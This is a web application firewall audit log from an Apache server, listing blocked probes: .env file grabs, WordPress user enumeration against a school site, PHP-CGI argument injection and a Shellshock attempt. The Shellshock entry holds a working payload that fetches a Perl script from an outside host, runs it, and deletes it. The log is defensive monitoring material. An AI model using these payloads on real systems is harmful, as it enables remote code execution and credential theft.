Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21951a1d-Z-- --289fc422-A-- [15/Jun/2025:11:49:50 +0700] aE5Q7rr7GPil_2h-MzYIjQAAAMY 103.236.140.4 35248 103.236.140.4 8181 --289fc422-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-A600FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --289fc422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --289fc422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749962990861438 681 (- - -) Stopwatch2: 1749962990861438 681; combined=290, p1=260, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --289fc422-Z-- --6267940d-A-- [15/Jun/2025:12:01:05 +0700] aE5TkYZIfYpKBvn-jB7KjQAAAFA 103.236.140.4 35350 103.236.140.4 8181 --6267940d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.216.200.253 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.216.200.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr --6267940d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6267940d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749963665720784 809 (- - -) Stopwatch2: 1749963665720784 809; combined=343, p1=261, p2=0, p3=0, p4=0, p5=82, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6267940d-Z-- --66be6d0b-A-- [15/Jun/2025:12:53:29 +0700] aE5f2T2YoubFl106kA3UkgAAAIQ 103.236.140.4 36954 103.236.140.4 8181 --66be6d0b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.179.89.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.179.89.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66be6d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66be6d0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749966809266342 3056 (- - -) Stopwatch2: 1749966809266342 3056; combined=1289, p1=422, p2=838, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66be6d0b-Z-- --25905223-A-- [15/Jun/2025:13:02:12 +0700] aE5h5Lr7GPil_2h-MzYJUAAAAMA 103.236.140.4 37246 103.236.140.4 8181 --25905223-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.168.234.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.168.234.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25905223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25905223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749967332343572 2801 (- - -) Stopwatch2: 1749967332343572 2801; combined=1266, p1=430, p2=806, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25905223-Z-- --57ac8e0c-A-- [15/Jun/2025:13:33:50 +0700] aE5pTj2YoubFl106kA3VNAAAAJY 103.236.140.4 37378 103.236.140.4 8181 --57ac8e0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.22.220.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.22.220.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --57ac8e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ac8e0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749969230793393 3038 (- - -) Stopwatch2: 1749969230793393 3038; combined=1287, p1=420, p2=837, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ac8e0c-Z-- --16b4dd55-A-- [15/Jun/2025:13:38:31 +0700] aE5qZ_GguMGNwgSGIMwkTAAAAAg 103.236.140.4 37558 103.236.140.4 8181 --16b4dd55-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.166.241.100 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.166.241.100 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --16b4dd55-C-- --16b4dd55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16b4dd55-E-- --16b4dd55-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749969511839964 4426 (- - -) Stopwatch2: 1749969511839964 4426; combined=2952, p1=552, p2=2363, p3=0, p4=0, p5=37, sr=167, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16b4dd55-Z-- --c6556c64-A-- [15/Jun/2025:13:42:51 +0700] aE5ra7r7GPil_2h-MzYJXQAAANA 103.236.140.4 38174 103.236.140.4 8181 --c6556c64-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36 Accept-Charset: utf-8 --c6556c64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6556c64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749969771337015 815 (- - -) Stopwatch2: 1749969771337015 815; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6556c64-Z-- --2ba98936-A-- [15/Jun/2025:14:10:09 +0700] aE5x0T2YoubFl106kA3WNwAAAIs 103.236.140.4 38360 103.236.140.4 8181 --2ba98936-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 106.13.78.99 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 106.13.78.99 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --2ba98936-C-- --2ba98936-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ba98936-E-- --2ba98936-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749971409494276 5454 (- - -) Stopwatch2: 1749971409494276 5454; combined=3277, p1=562, p2=2676, p3=0, p4=0, p5=38, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ba98936-Z-- --4cab7f00-A-- [15/Jun/2025:14:16:10 +0700] aE5zOrr7GPil_2h-MzYJcwAAAMQ 103.236.140.4 38478 103.236.140.4 8181 --4cab7f00-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 97.74.83.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 97.74.83.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4cab7f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cab7f00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749971770530937 2233 (- - -) Stopwatch2: 1749971770530937 2233; combined=1146, p1=373, p2=745, p3=0, p4=0, p5=27, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cab7f00-Z-- --9288e518-A-- [15/Jun/2025:14:34:10 +0700] aE53cvGguMGNwgSGIMwkfQAAABc 103.236.140.4 38778 103.236.140.4 8181 --9288e518-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.1000 Chrome/30.0.1599.101 Safari/537.36 Accept-Charset: utf-8 --9288e518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9288e518-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749972850036511 962 (- - -) Stopwatch2: 1749972850036511 962; combined=392, p1=350, p2=0, p3=0, p4=0, p5=42, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9288e518-Z-- --a156401f-A-- [15/Jun/2025:14:34:50 +0700] aE53moZIfYpKBvn-jB7MuwAAAEY 103.236.140.4 38782 103.236.140.4 8181 --a156401f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 Accept-Charset: utf-8 --a156401f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a156401f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749972890760087 878 (- - -) Stopwatch2: 1749972890760087 878; combined=382, p1=341, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a156401f-Z-- --8efba36e-A-- [15/Jun/2025:14:42:41 +0700] aE55cT2YoubFl106kA3WugAAAIM 103.236.140.4 38802 103.236.140.4 8181 --8efba36e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.166.188.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.166.188.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8efba36e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8efba36e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749973361544883 3437 (- - -) Stopwatch2: 1749973361544883 3437; combined=1530, p1=521, p2=976, p3=0, p4=0, p5=33, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8efba36e-Z-- --92e78f3a-A-- [15/Jun/2025:15:07:40 +0700] aE5_TLr7GPil_2h-MzYJ1AAAANY 103.236.140.4 39582 103.236.140.4 8181 --92e78f3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --92e78f3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92e78f3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749974860521334 761 (- - -) Stopwatch2: 1749974860521334 761; combined=308, p1=269, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92e78f3a-Z-- --887c8407-A-- [15/Jun/2025:15:10:20 +0700] aE5_7Lr7GPil_2h-MzYJ1gAAAME 103.236.140.4 39620 103.236.140.4 8181 --887c8407-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.48.193.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.48.193.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --887c8407-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --887c8407-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749975020007429 2494 (- - -) Stopwatch2: 1749975020007429 2494; combined=1128, p1=353, p2=749, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --887c8407-Z-- --85e04060-A-- [15/Jun/2025:15:20:21 +0700] aE6CRYZIfYpKBvn-jB7NlgAAAFQ 103.236.140.4 39688 103.236.140.4 8181 --85e04060-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.179.100.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.179.100.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --85e04060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85e04060-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749975621826856 2284 (- - -) Stopwatch2: 1749975621826856 2284; combined=1255, p1=412, p2=814, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85e04060-Z-- --6116303e-A-- [15/Jun/2025:15:29:36 +0700] aE6EcIZIfYpKBvn-jB7PRQAAAFI 103.236.140.4 45858 103.236.140.4 8181 --6116303e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.204.187.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.204.187.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6116303e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6116303e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749976176347962 3292 (- - -) Stopwatch2: 1749976176347962 3292; combined=1440, p1=507, p2=905, p3=0, p4=0, p5=28, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6116303e-Z-- --4971e404-A-- [15/Jun/2025:16:12:48 +0700] aE6OkIZIfYpKBvn-jB7bRwAAAEI 103.236.140.4 37666 103.236.140.4 8181 --4971e404-B-- GET /nagios/cgi-bin/status.cgi HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.131.118.62 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.131.118.62 X-Forwarded-Proto: http Connection: close Accept: */* Accept-Language: en-us User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nZAZAZA"';system("wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit") --4971e404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4971e404-H-- Message: Access denied with code 403 (phase 1). Pattern match "^(?:\\'\\w+?=)?\\(\\)\\s{" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749978768560732 898 (- - -) Stopwatch2: 1749978768560732 898; combined=394, p1=336, p2=0, p3=0, p4=0, p5=57, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
